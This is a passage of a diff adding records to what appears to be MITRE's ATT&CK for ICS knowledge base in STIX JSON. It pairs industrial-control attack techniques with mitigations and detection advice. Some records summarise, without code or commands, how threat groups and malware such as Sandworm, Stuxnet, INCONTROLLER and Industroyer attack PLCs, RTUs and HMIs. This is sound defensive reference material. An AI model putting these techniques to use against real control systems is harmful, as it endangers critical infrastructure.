
2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Implement network allowlists to minimize serial comm port access to only authorized hosts, such as comm servers and RTUs.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5424e327-396f-4b07-94a3-408ffc915686", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Allanite Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/allanite/" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 
2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:18.975Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) has been identified to collect and distribute screenshots of ICS systems such as HMIs. (Citation: Dragos) (Citation: ICS-CERT October 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51eb15a3-48af-470f-94c0-10f25b366d72", + "created": "2022-09-28T20:30:22.148Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. 
Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.436Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can establish a remote HTTP connection to change the operating mode of Omron PLCs.(Citation: Dragos-Pipedream)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b8edcf0a-ec53-4203-b3ad-2cc734a1f1dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.226Z", + "relationship_type": "mitigates", + "description": "Update software on control network assets when possible. 
If feasible, use modern operating systems and software to reduce exposure to known vulnerabilities.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3dde2b07-7c30-4a18-a9df-f85db84f9b14", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.214Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--26d68f5d-6ee5-4d98-b175-943366ccc038", + "created": "2020-10-14T21:33:27.046Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos October 2018", + "description": "Dragos 2018, October 12 Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Retrieved. 2019/10/14 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:54:09.871Z", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) uses the MS-SQL server xp_cmdshell command, and PowerShell to execute commands. (Citation: Dragos October 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--db52c1b6-4e48-4e8c-a34c-3ca21b26fe8a", + "created": "2022-09-30T15:34:29.316Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T15:34:29.316Z", + "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations. 
Note that some ICS protocols use broadcast or multicast functionality, which may produce false positives. Also monitor for hosts enumerating network connected resources using non-ICS enterprise protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ce7c17b7-b60d-4ebd-9014-2c421a64d70a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.207Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a", + "created": "2022-09-27T15:49:26.908Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:49:26.908Z", + "description": "Monitor asset application logs for information that indicate task parameters have changed.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b9e82422-b072-494f-99c1-fcab07b90133", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.146Z", + "relationship_type": "mitigates", + "description": "Require signed binaries.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6be102a8-5d9c-494e-a8ce-7b0a1c86a863", + "created": "2022-05-11T16:22:58.805Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:22.279Z", + "description": "Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cb38425c-646d-4bc8-bdea-e6cc630c3034", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:18:37.808Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--088580e9-ccea-426e-9411-c1de60de650d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.206Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5771ce27-7cc7-4144-8c11-c1a6d2ac3e2c", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:33:10.450Z", + "description": "Monitor for unexpected changes to project files, although if the malicious modification occurs in tandem with legitimate changes it will be difficult to isolate the unintended changes by analyzing only file systems modifications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + 
"x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25ddb2e0-b945-45d2-a8a9-6e6d5c4401d3", + "created": "2023-03-30T18:57:21.754Z", + "revoked": false, + "external_references": [ + { + "source_name": "Kevin Savage and Branko Spasojevic", + "description": "Kevin Savage and Branko Spasojevic W32.Flamer Retrieved. 2019/11/03 ", + "url": "https://web.archive.org/web/20190930124504/https://www.symantec.com/security-center/writeup/2012-052811-0308-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:57:21.754Z", + "description": "[Flame](https://attack.mitre.org/software/S0143) has built-in modules to gather information from compromised computers. (Citation: Kevin Savage and Branko Spasojevic)", + "relationship_type": "uses", + "source_ref": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--968830b7-ee80-4a6e-96a4-9fc70470e4a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.112Z", + "relationship_type": "mitigates", + "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and public disclosure.\n", + "source_ref": 
"course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f2e672bb-8c73-4066-94d8-7dfb9a8025a7", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:48:28.074Z", + "description": "Monitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. 
Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5dfa5bad-8b0b-4884-bf01-04ea89e3ccf7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.235Z", + "relationship_type": "mitigates", + "description": "Consider using IP allowlisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": 
"relationship--c8dd2735-bd04-4413-847d-316b77c6de19", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:23:14.457Z", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in the [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c785c026-4139-4c56-a6dd-cdd3ba75bab1", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:57:08.952Z", + "description": "In [Industroyer](https://attack.mitre.org/software/S0604) the first COM port from the configuration file is used for the actual communication and the two other COM ports are just opened to prevent other processes accessing them. Thus, the IEC 101 payload component is able to take over and maintain control of the RTU device. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--892c0bff-17b6-447b-a213-6a3189a1df82", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:51:45.844Z", + "description": "Monitor for newly executed processes that can aid in sniffing network traffic to capture information about an environment.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a717ccc7-0fe6-4a83-951f-5a89037ed927", + "created": "2023-03-30T14:08:06.442Z", + 
"revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:08:06.442Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8334b3ab-f17f-460e-b627-ad85fc9c2409", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:42:35.018Z", + "description": "Monitor Windows registry keys that may be deleted or alter generated artifacts on a host system, including logs 
or captured files such as quarantined malware. For added context on adversary procedures and background see [Indicator Removal](https://attack.mitre.org/techniques/T1070) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--45ee1822-71e4-4d92-976d-306561b70555", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b5bb5ec3-aa3c-4734-8425-4be80c5658a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.143Z", + "relationship_type": "mitigates", + "description": "This technique may not be effectively mitigated against, consider controls for assets and processes that lead to the use of this technique.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5c695f49-6c76-4818-88b6-4db2bf029e43", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T17:38:22.073Z", + "description": "Monitor for file creation in conjunction with other techniques (e.g., file transfers using [Remote Services](https://attack.mitre.org/techniques/T0886)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
